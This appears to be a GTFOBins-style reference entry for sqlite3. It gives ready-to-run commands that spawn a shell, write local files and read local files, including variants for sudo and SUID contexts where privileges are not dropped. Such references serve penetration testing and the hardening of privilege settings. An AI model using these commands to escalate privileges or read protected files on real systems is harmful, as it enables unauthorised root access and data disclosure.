This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
sqlite3 /dev/null '.shell /bin/sh'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
sqlite3 /dev/null '.shell /bin/sh'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
sqlite3 /dev/null '.shell /bin/sh'
This executable can write data to local files.
This function can be performed by any unprivileged user.
sqlite3 /dev/null -cmd ".output /path/to/output-file" 'select "DATA";'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
sqlite3 /dev/null -cmd ".output /path/to/output-file" 'select "DATA";'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
sqlite3 /dev/null -cmd ".output /path/to/output-file" 'select "DATA";'
This executable can read data from local files.
This function can be performed by any unprivileged user.
sqlite3 <<EOF
CREATE TABLE x(x TEXT);
.import /path/to/input-file x
SELECT * FROM x;
EOF
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
sqlite3 <<EOF
CREATE TABLE x(x TEXT);
.import /path/to/input-file x
SELECT * FROM x;
EOF
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
sqlite3 <<EOF
CREATE TABLE x(x TEXT);
.import /path/to/input-file x
SELECT * FROM x;
EOF